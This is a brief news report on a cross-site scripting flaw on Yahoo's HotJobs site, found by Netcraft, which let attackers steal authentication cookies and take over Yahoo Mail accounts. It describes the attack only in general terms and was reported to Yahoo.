A cross-site scripting security hole on the Yahoo website, detected by a Netcraft toolbar, could be used to steal identity cookies.
Netcraft's Paul Mutton noted in a blog post Monday that the vulnerability was found on Yahoo's HotJobs search engine site, where hackers had embedded malicious JavaScript code.
"The script steals authentication cookies destined for the Yahoo domain and then sends them off to various sites around the U.S. where they are collected by the attacker," Mutton said.
The stolen credentials would enable an attacker to access the victim's Yahoo account, including any Yahoo Mail accounts. The flaw is similar to one that affected another Yahoo property earlier this year.
Mutton noted that simply visiting a malicious URL on the Yahoo site would be enough to make a victim of the attack, allowing the hacker to obtain cookies from the victim's ongoing session and gain access to the victim's Yahoo Mail account without even entering a username or password. A blank page is returned to the victim so he or she doesn't realize the account has been compromised.
Mutton pointed out that Web sites must protect cookie values. Netcraft has reported the flaw to Yahoo. A Yahoo spokesman could not be found for comment Monday afternoon.